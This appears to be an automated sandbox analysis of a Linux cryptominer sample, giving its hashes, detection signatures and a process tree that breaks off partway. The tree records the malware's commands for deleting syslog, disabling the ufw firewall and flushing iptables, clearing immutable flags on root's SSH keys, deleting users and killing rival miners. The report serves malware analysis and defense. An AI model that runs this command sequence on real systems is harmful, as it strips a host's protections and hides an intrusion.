Analysis
- max time kernel: 8s
- max time network: 131s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20240611-en
- resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
- submitted: 29-09-2024 11:33
Static task: static1
Behavioral task: behavioral1
- Sample: fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
- Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
- Sample: fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
- Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
- Sample: fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
- Resource: debian9-mipsbe-20240729-en
Behavioral task: behavioral4
- Sample: fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
- Resource: debian9-mipsel-20240418-en
General
- Target: fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
- Size: 27KB
- MD5: fe70c19936ef32efb00f3c75ea90e701
- SHA1: 461514742ae77741e53efb6975ffd8d3db264c92
- SHA256: 7f0e07d0e5f7af973ab0f2768f06c00efb7f37da49fb6939df547d076e2c62d5
- SHA512: dad1271c0984f3120dc0c35725212fdccf707b4c3e5ecc6b1fe9e5ba95b295398d17fdac46c767375268fb1577128d23aa519ebfabc881a3b11e78de1b6a8f4b
- SSDEEP: 384:G7pQQwQHDf6jlpTWg3vMGQiKMvh/4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdeD:G7JoFNcDvFLcIwgiYq0xzBWjzr2W
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
Processes:
- File deleted: /var/log/syslog (process: rm)
-
Executes dropped EXE 1 IoCs
Processes:
- /usr/bin/salt-store (pid 3039)
-
Flushes firewall rules 1 TTPs 3 IoCs
Flushes/disables firewall rules inside the Linux kernel.
Processes:
- pid 1475: ufw
- pid 1650: iptables
- pid 2980
-
Processes:
- /lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko (pid 1479, process: modprobe)
-
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
Creates/modifies Cron job 1 TTPs 22 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Disables AppArmor 28 IoCs
Disables AppArmor security module.
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 2 IoCs
Processes:
- File opened for modification: /usr/bin/salt-store
- File opened for modification: /usr/bin/salt-store
-
Changes its process name 1 IoCs
Processes:
- Changes the process name, possibly in an attempt to hide itself: sysv-install (pid 2973)
-
Reads CPU attributes 1 TTPs 64 IoCs
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
- File opened for reading: /sys/module/ip6_tables/initstate (process: modprobe)
- File opened for reading: /sys/module/x_tables/initstate (process: modprobe)
-
Process Discovery 1 TTPs 64 IoCs
Adversaries may try to discover information about running processes.
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
- pid 1479: modprobe
- pid 1992: grep
- pid 2022: grep
- pid 2243: grep
- pid 2773
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
- File opened for modification: /tmp/log_rot (process: fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118)
Processes
-
/tmp/fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118  /tmp/fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118  1⤵  PID:1471
- Writes file to tmp directory
/bin/rm  rm -rf /var/log/syslog  2⤵  PID:1472
- Deletes system logs
/usr/bin/chattr  chattr -iua /tmp/  2⤵  PID:1473
/usr/bin/chattr  chattr -iua /var/tmp/  2⤵  PID:1474
/usr/sbin/ufw  ufw disable  2⤵  PID:1475
- Flushes firewall rules
/sbin/iptables  /sbin/iptables -V  3⤵  PID:1476
/lib/ufw/ufw-init  /lib/ufw/ufw-init force-stop  3⤵  PID:1477
/sbin/ip6tables  ip6tables -L INPUT -n  4⤵  PID:1478
/sbin/modprobe  /sbin/modprobe ip6_tables  5⤵  PID:1479
- Loads a kernel module
- Enumerates kernel/hardware configuration
- System Network Configuration Discovery
/sbin/iptables  iptables -F ufw-logging-deny  4⤵  PID:1483
/sbin/iptables  iptables -F ufw-logging-allow  4⤵  PID:1486
/sbin/iptables  iptables -F ufw-not-local  4⤵  PID:1487
/sbin/iptables  iptables -F ufw-user-logging-input  4⤵  PID:1488
/sbin/iptables  iptables -F ufw-user-limit-accept  4⤵  PID:1489
/sbin/iptables  iptables -F ufw-user-limit  4⤵  PID:1490
/sbin/iptables  iptables -F ufw-skip-to-policy-input  4⤵  PID:1491
- Attempts to change immutable files
/sbin/iptables  iptables -F ufw-reject-input  4⤵  PID:1492
/sbin/iptables  iptables -F ufw-after-logging-input  4⤵  PID:1493
/sbin/iptables  iptables -F ufw-after-input  4⤵  PID:1494
- Attempts to change immutable files
/sbin/iptables  iptables -F ufw-user-input  4⤵  PID:1495
/sbin/iptables  iptables -F ufw-before-input  4⤵  PID:1496
- Attempts to change immutable files
/sbin/iptables  iptables -F ufw-before-logging-input  4⤵  PID:1497
/sbin/iptables  iptables -F ufw-skip-to-policy-forward  4⤵  PID:1498
/sbin/iptables  iptables -F ufw-reject-forward  4⤵  PID:1499
/sbin/iptables  iptables -F ufw-after-logging-forward  4⤵  PID:1500
/sbin/iptables  iptables -F ufw-after-forward  4⤵  PID:1501
/sbin/iptables  iptables -F ufw-user-logging-forward  4⤵  PID:1502
/sbin/iptables  iptables -F ufw-user-forward  4⤵  PID:1503
/sbin/iptables  iptables -F ufw-before-forward  4⤵  PID:1504
/sbin/iptables  iptables -F ufw-before-logging-forward  4⤵  PID:1505
/sbin/iptables  iptables -F ufw-track-forward  4⤵  PID:1506
/sbin/iptables  iptables -F ufw-track-output  4⤵  PID:1507
/sbin/iptables  iptables -F ufw-track-input  4⤵  PID:1508
/sbin/iptables  iptables -F ufw-skip-to-policy-output  4⤵  PID:1509
/sbin/iptables  iptables -F ufw-reject-output  4⤵  PID:1510
/sbin/iptables  iptables -F ufw-after-logging-output  4⤵  PID:1511
/sbin/iptables  iptables -F ufw-after-output  4⤵  PID:1512
/sbin/iptables  iptables -F ufw-user-logging-output  4⤵  PID:1513
/sbin/iptables  iptables -F ufw-user-output  4⤵  PID:1514
/sbin/iptables  iptables -F ufw-before-output  4⤵  PID:1515
/sbin/iptables  iptables -F ufw-before-logging-output  4⤵  PID:1516
/sbin/iptables  iptables -Z ufw-logging-deny  4⤵  PID:1517
/sbin/iptables  iptables -Z ufw-logging-allow  4⤵  PID:1518
/sbin/iptables  iptables -Z ufw-not-local  4⤵  PID:1519
/sbin/iptables  iptables -Z ufw-user-logging-input  4⤵  PID:1520
/sbin/iptables  iptables -Z ufw-user-limit-accept  4⤵  PID:1521
/sbin/iptables  iptables -Z ufw-user-limit  4⤵  PID:1522
/sbin/iptables  iptables -Z ufw-skip-to-policy-input  4⤵  PID:1523
/sbin/iptables  iptables -Z ufw-reject-input  4⤵  PID:1524
/sbin/iptables  iptables -Z ufw-after-logging-input  4⤵  PID:1525
- Attempts to change immutable files
/sbin/iptables  iptables -Z ufw-after-input  4⤵  PID:1526
- Attempts to change immutable files
/sbin/iptables  iptables -Z ufw-user-input  4⤵  PID:1527
/sbin/iptables  iptables -Z ufw-before-input  4⤵  PID:1528
/sbin/iptables  iptables -Z ufw-before-logging-input  4⤵  PID:1529
/sbin/iptables  iptables -Z ufw-skip-to-policy-forward  4⤵  PID:1530
/sbin/iptables  iptables -Z ufw-reject-forward  4⤵  PID:1531
/sbin/iptables  iptables -Z ufw-after-logging-forward  4⤵  PID:1532
/sbin/iptables  iptables -Z ufw-after-forward  4⤵  PID:1533
/sbin/iptables  iptables -Z ufw-user-logging-forward  4⤵  PID:1534
/sbin/iptables  iptables -Z ufw-user-forward  4⤵  PID:1535
/sbin/iptables  iptables -Z ufw-before-forward  4⤵  PID:1536
/sbin/iptables  iptables -Z ufw-before-logging-forward  4⤵  PID:1537
/sbin/iptables  iptables -Z ufw-track-forward  4⤵  PID:1538
/sbin/iptables  iptables -Z ufw-track-output  4⤵  PID:1542
/sbin/iptables  iptables -Z ufw-track-input  4⤵  PID:1543
/sbin/iptables  iptables -Z ufw-skip-to-policy-output  4⤵  PID:1544
/sbin/iptables  iptables -Z ufw-reject-output  4⤵  PID:1545
/sbin/iptables  iptables -Z ufw-after-logging-output  4⤵  PID:1546
/sbin/iptables  iptables -Z ufw-after-output  4⤵  PID:1547
/sbin/iptables  iptables -Z ufw-user-logging-output  4⤵  PID:1548
/sbin/iptables  iptables -Z ufw-user-output  4⤵  PID:1549
/sbin/iptables  iptables -Z ufw-before-output  4⤵  PID:1550
/sbin/iptables  iptables -Z ufw-before-logging-output  4⤵  PID:1551
/sbin/iptables  iptables -X ufw-logging-deny  4⤵  PID:1552
/sbin/iptables  iptables -X ufw-logging-allow  4⤵  PID:1553
/sbin/iptables  iptables -X ufw-not-local  4⤵  PID:1554
/sbin/iptables  iptables -X ufw-user-logging-input  4⤵  PID:1555
- Attempts to change immutable files
/sbin/iptables  iptables -X ufw-user-logging-output  4⤵  PID:1556
/sbin/iptables  iptables -X ufw-user-logging-forward  4⤵  PID:1557
/sbin/iptables  iptables -X ufw-user-limit-accept  4⤵  PID:1558
/sbin/iptables  iptables -X ufw-user-limit  4⤵  PID:1559
/sbin/iptables  iptables -X ufw-user-input  4⤵  PID:1560
/sbin/iptables  iptables -X ufw-user-forward  4⤵  PID:1561
/sbin/iptables  iptables -X ufw-user-output  4⤵  PID:1562
/sbin/iptables  iptables -X ufw-skip-to-policy-input  4⤵  PID:1563
- Attempts to change immutable files
/sbin/iptables  iptables -X ufw-skip-to-policy-output  4⤵  PID:1564
/sbin/iptables  iptables -X ufw-skip-to-policy-forward  4⤵  PID:1565
/sbin/iptables  iptables -P INPUT ACCEPT  4⤵  PID:1566
/sbin/iptables  iptables -P OUTPUT ACCEPT  4⤵  PID:1567
/sbin/iptables  iptables -P FORWARD ACCEPT  4⤵  PID:1568
/sbin/ip6tables  ip6tables -F ufw6-logging-deny  4⤵  PID:1569
/sbin/ip6tables  ip6tables -F ufw6-logging-allow  4⤵  PID:1570
/sbin/ip6tables  ip6tables -F ufw6-not-local  4⤵  PID:1571
/sbin/ip6tables  ip6tables -F ufw6-user-logging-input  4⤵  PID:1572
/sbin/ip6tables  ip6tables -F ufw6-user-limit-accept  4⤵  PID:1573
/sbin/ip6tables  ip6tables -F ufw6-user-limit  4⤵  PID:1574
/sbin/ip6tables  ip6tables -F ufw6-skip-to-policy-input  4⤵  PID:1575
/sbin/ip6tables  ip6tables -F ufw6-reject-input  4⤵  PID:1576
/sbin/ip6tables  ip6tables -F ufw6-after-logging-input  4⤵  PID:1577
/sbin/ip6tables  ip6tables -F ufw6-after-input  4⤵  PID:1578
/sbin/ip6tables  ip6tables -F ufw6-user-input  4⤵  PID:1579
/sbin/ip6tables  ip6tables -F ufw6-before-input  4⤵  PID:1580
/sbin/ip6tables  ip6tables -F ufw6-before-logging-input  4⤵  PID:1581
/sbin/ip6tables  ip6tables -F ufw6-skip-to-policy-forward  4⤵  PID:1582
/sbin/ip6tables  ip6tables -F ufw6-reject-forward  4⤵  PID:1583
/sbin/ip6tables  ip6tables -F ufw6-after-logging-forward  4⤵  PID:1584
/sbin/ip6tables  ip6tables -F ufw6-after-forward  4⤵  PID:1585
/sbin/ip6tables  ip6tables -F ufw6-user-logging-forward  4⤵  PID:1586
/sbin/ip6tables  ip6tables -F ufw6-user-forward  4⤵  PID:1587
/sbin/ip6tables  ip6tables -F ufw6-before-forward  4⤵  PID:1588
/sbin/ip6tables  ip6tables -F ufw6-before-logging-forward  4⤵  PID:1589
/sbin/ip6tables  ip6tables -F ufw6-track-forward  4⤵  PID:1590
/sbin/ip6tables  ip6tables -F ufw6-track-output  4⤵  PID:1591
/sbin/ip6tables  ip6tables -F ufw6-track-input  4⤵  PID:1592
/sbin/ip6tables  ip6tables -F ufw6-skip-to-policy-output  4⤵  PID:1593
/sbin/ip6tables  ip6tables -F ufw6-reject-output  4⤵  PID:1594
/sbin/ip6tables  ip6tables -F ufw6-after-logging-output  4⤵  PID:1595
/sbin/ip6tables  ip6tables -F ufw6-after-output  4⤵  PID:1596
/sbin/ip6tables  ip6tables -F ufw6-user-logging-output  4⤵  PID:1597
/sbin/ip6tables  ip6tables -F ufw6-user-output  4⤵  PID:1598
/sbin/ip6tables  ip6tables -F ufw6-before-output  4⤵  PID:1599
/sbin/ip6tables  ip6tables -F ufw6-before-logging-output  4⤵  PID:1600
/sbin/ip6tables  ip6tables -Z ufw6-logging-deny  4⤵  PID:1601
/sbin/ip6tables  ip6tables -Z ufw6-logging-allow  4⤵  PID:1602
/sbin/ip6tables  ip6tables -Z ufw6-not-local  4⤵  PID:1603
/sbin/ip6tables  ip6tables -Z ufw6-user-logging-input  4⤵  PID:1604
- Attempts to change immutable files
/sbin/ip6tables  ip6tables -Z ufw6-user-limit-accept  4⤵  PID:1605
/sbin/ip6tables  ip6tables -Z ufw6-user-limit  4⤵  PID:1606
/sbin/ip6tables  ip6tables -Z ufw6-skip-to-policy-input  4⤵  PID:1607
/sbin/ip6tables  ip6tables -Z ufw6-reject-input  4⤵  PID:1608
- Attempts to change immutable files
/sbin/ip6tables  ip6tables -Z ufw6-after-logging-input  4⤵  PID:1609
/sbin/ip6tables  ip6tables -Z ufw6-after-input  4⤵  PID:1610
/sbin/ip6tables  ip6tables -Z ufw6-user-input  4⤵  PID:1611
/sbin/ip6tables  ip6tables -Z ufw6-before-input  4⤵  PID:1612
- Attempts to change immutable files
/sbin/ip6tables  ip6tables -Z ufw6-before-logging-input  4⤵  PID:1613
/sbin/ip6tables  ip6tables -Z ufw6-skip-to-policy-forward  4⤵  PID:1614
/sbin/ip6tables  ip6tables -Z ufw6-reject-forward  4⤵  PID:1615
/sbin/ip6tables  ip6tables -Z ufw6-after-logging-forward  4⤵  PID:1616
/sbin/ip6tables  ip6tables -Z ufw6-after-forward  4⤵  PID:1617
/sbin/ip6tables  ip6tables -Z ufw6-user-logging-forward  4⤵  PID:1618
/sbin/ip6tables  ip6tables -Z ufw6-user-forward  4⤵  PID:1619
/sbin/ip6tables  ip6tables -Z ufw6-before-forward  4⤵  PID:1620
/sbin/ip6tables  ip6tables -Z ufw6-before-logging-forward  4⤵  PID:1621
/sbin/ip6tables  ip6tables -Z ufw6-track-forward  4⤵  PID:1622
/sbin/ip6tables  ip6tables -Z ufw6-track-output  4⤵  PID:1623
/sbin/ip6tables  ip6tables -Z ufw6-track-input  4⤵  PID:1624
- Attempts to change immutable files
/sbin/ip6tables  ip6tables -Z ufw6-skip-to-policy-output  4⤵  PID:1625
/sbin/ip6tables  ip6tables -Z ufw6-reject-output  4⤵  PID:1626
/sbin/ip6tables  ip6tables -Z ufw6-after-logging-output  4⤵  PID:1627
/sbin/ip6tables  ip6tables -Z ufw6-after-output  4⤵  PID:1628
/sbin/ip6tables  ip6tables -Z ufw6-user-logging-output  4⤵  PID:1629
/sbin/ip6tables  ip6tables -Z ufw6-user-output  4⤵  PID:1630
/sbin/ip6tables  ip6tables -Z ufw6-before-output  4⤵  PID:1631
/sbin/ip6tables  ip6tables -Z ufw6-before-logging-output  4⤵  PID:1632
/sbin/ip6tables  ip6tables -X ufw6-logging-deny  4⤵  PID:1633
/sbin/ip6tables  ip6tables -X ufw6-logging-allow  4⤵  PID:1634
/sbin/ip6tables  ip6tables -X ufw6-not-local  4⤵  PID:1635
/sbin/ip6tables  ip6tables -X ufw6-user-logging-input  4⤵  PID:1636
- Attempts to change immutable files
/sbin/ip6tables  ip6tables -X ufw6-user-logging-output  4⤵  PID:1637
/sbin/ip6tables  ip6tables -X ufw6-user-logging-forward  4⤵  PID:1638
/sbin/ip6tables  ip6tables -X ufw6-user-limit-accept  4⤵  PID:1639
/sbin/ip6tables  ip6tables -X ufw6-user-limit  4⤵  PID:1640
/sbin/ip6tables  ip6tables -X ufw6-user-input  4⤵  PID:1641
/sbin/ip6tables  ip6tables -X ufw6-user-forward  4⤵  PID:1642
/sbin/ip6tables  ip6tables -X ufw6-user-output  4⤵  PID:1643
/sbin/ip6tables  ip6tables -X ufw6-skip-to-policy-input  4⤵  PID:1644
/sbin/ip6tables  ip6tables -X ufw6-skip-to-policy-output  4⤵  PID:1645
/sbin/ip6tables  ip6tables -X ufw6-skip-to-policy-forward  4⤵  PID:1646
/sbin/ip6tables  ip6tables -P INPUT ACCEPT  4⤵  PID:1647
/sbin/ip6tables  ip6tables -P OUTPUT ACCEPT  4⤵  PID:1648
/sbin/ip6tables  ip6tables -P FORWARD ACCEPT  4⤵  PID:1649
/sbin/iptables  iptables -F  2⤵  PID:1650
- Flushes firewall rules
/usr/bin/sudo  sudo sysctl "kernel.nmi_watchdog=0"  2⤵  PID:1651
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
/usr/sbin/userdel  userdel akay  2⤵  PID:1655
/usr/sbin/userdel  userdel vfinder  2⤵  PID:1659
/usr/bin/chattr  chattr -iae /root/.ssh/  2⤵  PID:1660
/usr/bin/chattr  chattr -iae /root/.ssh/authorized_keys  2⤵  PID:1664
/bin/rm  rm -rf "/tmp/addres*"  2⤵  PID:1665
/bin/rm  rm -rf "/tmp/walle*"  2⤵  PID:1666
/bin/rm  rm -rf /tmp/keys  2⤵  PID:1667
/bin/grep  grep -i "[a]liyun"  2⤵  PID:1669
/bin/ps  ps aux  2⤵  PID:1668
- Process Discovery
/bin/grep  grep -i "[y]unjing"  2⤵  PID:1671
/bin/ps  ps aux  2⤵  PID:1670
- Reads CPU attributes
- Reads runtime system information
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1675
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1674
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1676
/bin/grep  grep 185.71.65.238  2⤵  PID:1673
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1681
- Attempts to change immutable files
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1680
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1679
/bin/grep  grep 140.82.52.87  2⤵  PID:1678
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1687
/bin/grep  grep -v -  2⤵  PID:1686
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1685
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1684
/bin/grep  grep :443  2⤵  PID:1683
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1693
/bin/grep  grep -v -  2⤵  PID:1692
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1691
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1690
/bin/grep  grep :23  2⤵  PID:1689
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1699
- Attempts to change immutable files
/bin/grep  grep -v -  2⤵  PID:1698
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1697
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1696
/bin/grep  grep :443  2⤵  PID:1695
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1706
/bin/grep  grep -v -  2⤵  PID:1705
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1704
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1703
/bin/grep  grep :143  2⤵  PID:1702
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1714
- Attempts to change immutable files
/bin/grep  grep -v -  2⤵  PID:1713
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1712
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1711
/bin/grep  grep :2222  2⤵  PID:1710
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1720
/bin/grep  grep -v -  2⤵  PID:1719
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1718
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1717
/bin/grep  grep :3333  2⤵  PID:1716
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1726
/bin/grep  grep -v -  2⤵  PID:1725
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1724
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1723
/bin/grep  grep :3389  2⤵  PID:1722
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1732
/bin/grep  grep -v -  2⤵  PID:1731
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1730
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1729
/bin/grep  grep :4444  2⤵  PID:1728
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1738
- Attempts to change immutable files
/bin/grep  grep -v -  2⤵  PID:1737
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1736
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1735
/bin/grep  grep :5555  2⤵  PID:1734
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1744
/bin/grep  grep -v -  2⤵  PID:1743
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1742
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1741
/bin/grep  grep :6666  2⤵  PID:1740
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1750
/bin/grep  grep -v -  2⤵  PID:1749
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1748
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1747
/bin/grep  grep :6665  2⤵  PID:1746
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1756
/bin/grep  grep -v -  2⤵  PID:1755
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1754
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1753
/bin/grep  grep :6667  2⤵  PID:1752
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1762
/bin/grep  grep -v -  2⤵  PID:1761
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1760
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1759
/bin/grep  grep :7777  2⤵  PID:1758
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1768
- Attempts to change immutable files
/bin/grep  grep -v -  2⤵  PID:1767
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1766
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1765
/bin/grep  grep :8444  2⤵  PID:1764
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1774
/bin/grep  grep -v -  2⤵  PID:1773
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1772
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1771
/bin/grep  grep :3347  2⤵  PID:1770
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1782
/bin/grep  grep -v -  2⤵  PID:1781
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1780
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1779
/bin/grep  grep :14444  2⤵  PID:1778
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1791
/bin/grep  grep -v -  2⤵  PID:1790
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1789
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1788
/bin/grep  grep :14433  2⤵  PID:1787
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1798
- Attempts to change immutable files
/bin/grep  grep -v -  2⤵  PID:1797
/usr/bin/awk  awk "-F[/]" "{print \$1}"  2⤵  PID:1796
/usr/bin/awk  awk "{print \$7}"  2⤵  PID:1795
/bin/grep  grep :13531  2⤵  PID:1794
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1803
/usr/bin/awk  awk "{print \$2}"  2⤵  PID:1802
/bin/grep  grep -v grep  2⤵  PID:1801
/bin/grep  grep "sleep 60"  2⤵  PID:1800
/bin/ps  ps aux  2⤵  PID:1799
- Process Discovery
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1808
/usr/bin/awk  awk "{print \$2}"  2⤵  PID:1807
/bin/grep  grep -v grep  2⤵  PID:1806
/bin/grep  grep ./crun  2⤵  PID:1805
/bin/ps  ps aux  2⤵  PID:1804
- Reads CPU attributes
- Process Discovery
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1813
- Attempts to change immutable files
/usr/bin/awk  awk "{if(\$3>80.0) print \$2}"  2⤵  PID:1812
/bin/grep  grep -v grep  2⤵  PID:1811
/bin/grep  grep -vw salt-minions  2⤵  PID:1810
/bin/ps  ps aux  2⤵  PID:1809
- Process Discovery
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1818
- Attempts to change immutable files
/usr/bin/awk  awk "{print \$2}"  2⤵  PID:1817
/bin/grep  grep :3333  2⤵  PID:1816
/bin/grep  grep -v grep  2⤵  PID:1815
/bin/ps  ps aux  2⤵  PID:1814
- Process Discovery
- Reads runtime system information
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1823
/usr/bin/awk  awk "{print \$2}"  2⤵  PID:1822
/bin/grep  grep :5555  2⤵  PID:1821
/bin/grep  grep -v grep  2⤵  PID:1820
/bin/ps  ps aux  2⤵  PID:1819
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1828
- Attempts to change immutable files
/usr/bin/awk  awk "{print \$2}"  2⤵  PID:1827
/bin/grep  grep "kworker -c\\"  2⤵  PID:1826
/bin/grep  grep -v grep  2⤵  PID:1825
/bin/ps  ps aux  2⤵  PID:1824
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1833
/usr/bin/awk  awk "{print \$2}"  2⤵  PID:1832
/bin/grep  grep log_  2⤵  PID:1831
/bin/grep  grep -v grep  2⤵  PID:1830
/bin/ps  ps aux  2⤵  PID:1829
- Process Discovery
- Reads runtime system information
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1838
/usr/bin/awk  awk "{print \$2}"  2⤵  PID:1837
/bin/grep  grep systemten  2⤵  PID:1836
/bin/grep  grep -v grep  2⤵  PID:1835
/bin/ps  ps aux  2⤵  PID:1834
- Process Discovery
- Reads runtime system information
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1843
/usr/local/sbin/kill  kill -9 14  3⤵  PID:1844
/usr/local/bin/kill  kill -9 14  3⤵  PID:1844
/usr/sbin/kill  kill -9 14  3⤵  PID:1844
/usr/bin/kill  kill -9 14  3⤵  PID:1844
/sbin/kill  kill -9 14  3⤵  PID:1844
/bin/kill  kill -9 14  3⤵  PID:1844
- Reads CPU attributes
/usr/bin/awk  awk "{print \$2}"  2⤵  PID:1842
/bin/grep  grep netns  2⤵  PID:1841
/bin/grep  grep -v grep  2⤵  PID:1840
/bin/ps  ps aux  2⤵  PID:1839
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1849
- Attempts to change immutable files
/usr/bin/awk  awk "{print \$2}"  2⤵  PID:1848
/bin/grep  grep voltuned  2⤵  PID:1847
/bin/grep  grep -v grep  2⤵  PID:1846
/bin/ps  ps aux  2⤵  PID:1845
- Reads CPU attributes
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1854
/usr/bin/awk  awk "{print \$2}"  2⤵  PID:1853
/bin/grep  grep darwin  2⤵  PID:1852
/bin/grep  grep -v grep  2⤵  PID:1851
/bin/ps  ps aux  2⤵  PID:1850
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1859
/usr/bin/awk  awk "{print \$2}"  2⤵  PID:1858
/bin/grep  grep /tmp/dl  2⤵  PID:1857
/bin/grep  grep -v grep  2⤵  PID:1856
/bin/ps  ps aux  2⤵  PID:1855
- Reads CPU attributes
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1864
/usr/bin/awk  awk "{print \$2}"  2⤵  PID:1863
/bin/grep  grep /tmp/ddg  2⤵  PID:1862
/bin/grep  grep -v grep  2⤵  PID:1861
/bin/ps  ps aux  2⤵  PID:1860
- Process Discovery
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1869
/usr/bin/awk  awk "{print \$2}"  2⤵  PID:1868
/bin/grep  grep /tmp/pprt  2⤵  PID:1867
/bin/grep  grep -v grep  2⤵  PID:1866
/bin/ps  ps aux  2⤵  PID:1865
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1874
/usr/bin/awk  awk "{print \$2}"  2⤵  PID:1873
/bin/grep  grep /tmp/ppol  2⤵  PID:1872
/bin/grep  grep -v grep  2⤵  PID:1871
/bin/ps  ps aux  2⤵  PID:1870
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1879
/usr/bin/awk  awk "{print \$2}"  2⤵  PID:1878
/bin/grep  grep "/tmp/65ccE*"  2⤵  PID:1877
